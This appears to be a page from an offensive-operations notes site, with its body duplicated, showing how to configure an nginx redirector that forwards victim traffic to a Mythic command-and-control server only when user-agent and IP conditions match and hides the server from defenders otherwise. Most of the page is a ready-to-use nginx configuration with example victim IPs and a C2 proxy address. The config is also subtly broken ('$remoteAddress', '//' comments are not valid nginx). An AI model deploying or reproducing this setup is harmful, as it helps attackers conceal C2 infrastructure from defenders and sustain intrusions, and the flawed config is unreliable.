C2 AGENT/USER-AGENT CONDITIONAL REDIRECTION (OPSEC)

this custom rule will only process requests originating from the victim environment based on conditions. if the criteria doesn't match, the victim's traffic gets redirected to a legitimate website. if the criteria matches, the traffic gets redirected to the adversary C2 infrastructure.

CONDITIONS

User Agent
- the endpoint/redirector will only process victim traffic if a specific user-agent string is identified
  - if traffic matches, the redirector forwards the traffic to the C2 server
  - if traffic doesn't match, the redirector forwards the traffic to a legitimate website or gets dropped
IP Range/Target Domain
- the endpoint/redirector will only process victim traffic if a specific ip range is identified
  - if traffic matches, the redirector forwards the traffic to the C2 server
  - if traffic doesn't match, the redirector forwards the traffic to a legitimate website or the packet gets dropped

root@oco:~$ cd /etc/nginx/conf.d
root@oco:~$ nano c2.conf
 server{
  listen 443 ssl http2 default_server;
  listen [::]:443 ssl http2 default_server;
  
  server_name nuclear.{domain}.{tld};
  root /var/www/html
  
  ssl_certificate "/etc/letsencrypt/live/nuclear.{domain}.{tld}/fullchain.pem";
  ssl_certificate_key "/etc/letsencrypt/live/nuclear.{domain}.{tld}/privkey.pem";
  ssl_session_cache shared:SSL:1m;
  ssl_session_timeout 10m;
  ssl_ciphers HIGH:!aNULL:!MD5;
  ssl_prefer_server_ciphers on;
  
  location / {
   set $C2 "";
   if ($http_user_agent ~ "{randomIdentification}"){
     //... ~ "42.1.228.0" or ... ~ "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
     set $C2 A;
   }
   if ($remoteAddress ~ "{victimIP1 or victimIPRange}"){
     //... ~ "74.235.35.184"
     set $C2 "${C2}B";
   }
   if ($remoteAddress ~ "{victimIP2 or victimIPRange}"){
     //... ~ "20.66.87.234"
     set $C2 "${C2}B";
   }
   if ($C2 = "AB"){
     proxy_pass {mythicC2ServerURL};
     //... http://20.66.23.137;
   }
   //this section gets triggered if the traffic doesn't match the specified conditions
   try_files $uri $uri/ =404;
  }

  error_page 404 /404.html;
  location = /var/www/html/40x.html{
  }
  error_page 500 502 503 504 /50x.html;
  location = /var/www/html/50x.html{
  }
 }
 
 * note: the traffic from the targets to the nginx redirector will be
   https; while the traffic from the nginx redirector to the mythic c2 server
   will be on http
    - BOTH conditions MUST match IOF the traffic pass through; else 403 Forbidden message is received

root@nginxVM:~$ sudo nginx -s reload
 * issue this cmd once everything is setup

c:\victim> BROWSER > https://nuclear.{domain}.{tld}
 * if the victim views this page, they'll receive a "403 Forbidden" message 
   because it MUST be the "payload agent" that should access the adversary domain 
   NOT the blue team!

PreviousNGINX (AWS EC2/AZURE)NextNGINX FW RULE

Last updated 3 months ago

CONDITIONS

User Agent

the endpoint/redirector will only process victim traffic if a specific user-agent string is identified
- if traffic matches, the redirector forwards the traffic to the C2 server
- if traffic doesn't match, the redirector forwards the traffic to a legitimate website or gets dropped

IP Range/Target Domain

the endpoint/redirector will only process victim traffic if a specific ip range is identified
- if traffic matches, the redirector forwards the traffic to the C2 server
- if traffic doesn't match, the redirector forwards the traffic to a legitimate website or the packet gets dropped

root@oco:~$ cd /etc/nginx/conf.d
root@oco:~$ nano c2.conf
 server{
  listen 443 ssl http2 default_server;
  listen [::]:443 ssl http2 default_server;
  
  server_name nuclear.{domain}.{tld};
  root /var/www/html
  
  ssl_certificate "/etc/letsencrypt/live/nuclear.{domain}.{tld}/fullchain.pem";
  ssl_certificate_key "/etc/letsencrypt/live/nuclear.{domain}.{tld}/privkey.pem";
  ssl_session_cache shared:SSL:1m;
  ssl_session_timeout 10m;
  ssl_ciphers HIGH:!aNULL:!MD5;
  ssl_prefer_server_ciphers on;
  
  location / {
   set $C2 "";
   if ($http_user_agent ~ "{randomIdentification}"){
     //... ~ "42.1.228.0" or ... ~ "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
     set $C2 A;
   }
   if ($remoteAddress ~ "{victimIP1 or victimIPRange}"){
     //... ~ "74.235.35.184"
     set $C2 "${C2}B";
   }
   if ($remoteAddress ~ "{victimIP2 or victimIPRange}"){
     //... ~ "20.66.87.234"
     set $C2 "${C2}B";
   }
   if ($C2 = "AB"){
     proxy_pass {mythicC2ServerURL};
     //... http://20.66.23.137;
   }
   //this section gets triggered if the traffic doesn't match the specified conditions
   try_files $uri $uri/ =404;
  }

  error_page 404 /404.html;
  location = /var/www/html/40x.html{
  }
  error_page 500 502 503 504 /50x.html;
  location = /var/www/html/50x.html{
  }
 }
 
 * note: the traffic from the targets to the nginx redirector will be
   https; while the traffic from the nginx redirector to the mythic c2 server
   will be on http
    - BOTH conditions MUST match IOF the traffic pass through; else 403 Forbidden message is received

root@nginxVM:~$ sudo nginx -s reload
 * issue this cmd once everything is setup

c:\victim> BROWSER > https://nuclear.{domain}.{tld}
 * if the victim views this page, they'll receive a "403 Forbidden" message 
   because it MUST be the "payload agent" that should access the adversary domain 
   NOT the blue team!